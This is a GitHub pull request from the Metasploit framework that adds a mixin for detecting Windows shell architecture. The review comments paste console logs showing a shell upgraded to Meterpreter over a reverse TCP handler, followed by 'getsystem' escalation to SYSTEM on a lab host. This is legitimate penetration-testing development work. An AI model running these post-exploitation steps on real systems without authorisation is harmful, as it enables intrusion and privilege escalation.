Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Created mixin to retrieve the architecture of the current shell. #18062

Merged
merged 3 commits into from Jun 5, 2023
Merged

Created mixin to retrieve the architecture of the current shell. #18062

merged 3 commits into from Jun 5, 2023

Conversation

smashery
Copy link
Contributor

@smashery smashery commented Jun 5, 2023

Adds a mixin to support retrieving the architecture of the current shell. In meterpreter, this uses the built in behaviour, which calls the appropriate API. In command shells and PowerShell, looks at the appropriate environment variables.

I added this to the shell_to_meterpreter module for now.

Currently only supports Windows, tested on Win2000 upwards.

Verification

To test this, I created a test module, that simply includes the mixin, calls get_os_architecture and prints it out.

Tested on:

Command Shell

  • Windows 2000 x86
  • Windows XP x86
  • Windows 2003 x86
  • Windows XP x64
  • Windows XP x64 (x86 process)
  • Windows Server 2008 x64
  • Windows Server 2008 x64 (x86 process)
  • Windows Server 2008 R2 x64
  • Windows Server 2008 R2 x64 (x86 process)
  • Windows Server 2012 x64
  • Windows Server 2012 x64 (x86 process)
  • Windows 10 x64
  • Windows 10 x64 (x86 process)
  • Windows Server 2022 x64
  • Windows Server 2022 x64 (x86 process)

Meterpreter

  • Windows XP x86
  • Windows 2003 x86
  • Windows XP x64
  • Windows XP x64 (x86 process)
  • Windows Server 2008 x64
  • Windows Server 2008 x64 (x86 process)
  • Windows Server 2008 R2 x64
  • Windows Server 2008 R2 x64 (x86 process)
  • Windows Server 2012 x64
  • Windows Server 2012 x64 (x86 process)
  • Windows 10 x64
  • Windows 10 x64 (x86 process)
  • Windows Server 2022 x64
  • Windows Server 2022 x64 (x86 process)

PowerShell

  • Windows Server 2008 R2 x64
  • Windows Server 2008 R2 x64 (x86 process)
  • Windows Server 2012 x64
  • Windows Server 2012 x64 (x86 process)
  • Windows 10 x64
  • Windows 10 x64 (x86 process)
  • Windows Server 2022 x64
  • Windows Server 2022 x64 (x86 process)

Python:

  • Python-32-bit on Win10 x64
  • Python-64-bit on Win10 x64

Java:

  • JRE64 on Win10

@smashery
Created mixin to retrieve the architecture of the current shell.
7959802 
Currently only supports Windows, but does work on Win2000 upwards.
gwillcox-r7
gwillcox-r7 reviewed Jun 5, 2023
View reviewed changes
Copy link
Contributor

@gwillcox-r7 gwillcox-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

One minor concern, but otherwise this code looks good, nice work!

lib/msf/core/post/architecture.rb Outdated Show resolved Hide resolved
@gwillcox-r7 gwillcox-r7 self-assigned this Jun 5, 2023
@gwillcox-r7
Copy link
Contributor

Windows Server 2022 WOW64 session working fine:

msf6 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type               Information                                                      Connection
  --  ----  ----               -----------                                                      ----------
  2         shell x86/windows  Shell Banner: Microsoft Windows [Version 10.0.20348.1726] -----  192.168.64.128:35533 -> 192.168.64.138:4444 (192.168.64.138)

msf6 post(multi/manage/shell_to_meterpreter) > exploit

[*] Upgrading session ID: 2
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.64.128:4433 
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > 
[*] Sending stage (200774 bytes) to 192.168.64.138
[*] Meterpreter session 3 opened (192.168.64.128:4433 -> 192.168.64.138:50066) at 2023-06-05 11:25:46 -0500
[*] Stopping exploit/multi/handler

msf6 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                      Connection
  --  ----  ----                     -----------                                                      ----------
  2         shell x86/windows        Shell Banner: Microsoft Windows [Version 10.0.20348.1726] -----  192.168.64.128:35533 -> 192.168.64.138:4444 (192.168.64.138)
  3         meterpreter x64/windows  DAFOREST\Administrator @ WIN-E72FSF87GO1                         192.168.64.128:4433 -> 192.168.64.138:50066 (192.168.64.138)

msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: DAFOREST\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

@gwillcox-r7
Copy link
Contributor

And with a native x64 shell on x64 it also seems to be correctly identifying the host as a x64 host:

msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 6
SESSION => 6
msf6 post(multi/manage/shell_to_meterpreter) > explit
[-] Unknown command: explit
msf6 post(multi/manage/shell_to_meterpreter) > exploit

[*] Upgrading session ID: 6
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.64.128:4433 
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > 
[*] Sending stage (200774 bytes) to 192.168.64.138
[*] Meterpreter session 7 opened (192.168.64.128:4433 -> 192.168.64.138:50092) at 2023-06-05 11:32:52 -0500
[*] Stopping exploit/multi/handler

msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 7
[*] Starting interaction with 7...

meterpreter > getuid
Server username: DAFOREST\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > background
[*] Backgrounding session 7...
smsf6 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                      Connection
  --  ----  ----                     -----------                                                      ----------
  6         shell x64/windows        Shell Banner: Microsoft Windows [Version 10.0.20348.1726] -----  192.168.64.128:40933 -> 192.168.64.138:4444 (192.168.64.138)
  7         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ WIN-E72FSF87GO1                            192.168.64.128:4433 -> 192.168.64.138:50092 (192.168.64.138)

msf6 post(multi/manage/shell_to_meterpreter) >

@gwillcox-r7
Copy link
Contributor

Content looks good, will land this once tests pass.

@gwillcox-r7 gwillcox-r7 merged commit d029b26 into rapid7:master Jun 5, 2023
30 checks passed
@gwillcox-r7
Copy link
Contributor

Release Notes

A new mixin has been added to support detecting the architecture of the host OS on Windows systems. Support for other OSes will be added at a later date.

@smashery smashery mentioned this pull request Jun 5, 2023
Merged
3 tasks
@zgoldman-r7 zgoldman-r7 mentioned this pull request Oct 23, 2023
Closed
@bcoles bcoles mentioned this pull request Oct 24, 2023
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@gwillcox-r7 gwillcox-r7 gwillcox-r7 left review comments

Assignees

@gwillcox-r7 gwillcox-r7

Labels
enhancement library rn-enhancement release notes enhancement
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@smashery @gwillcox-r7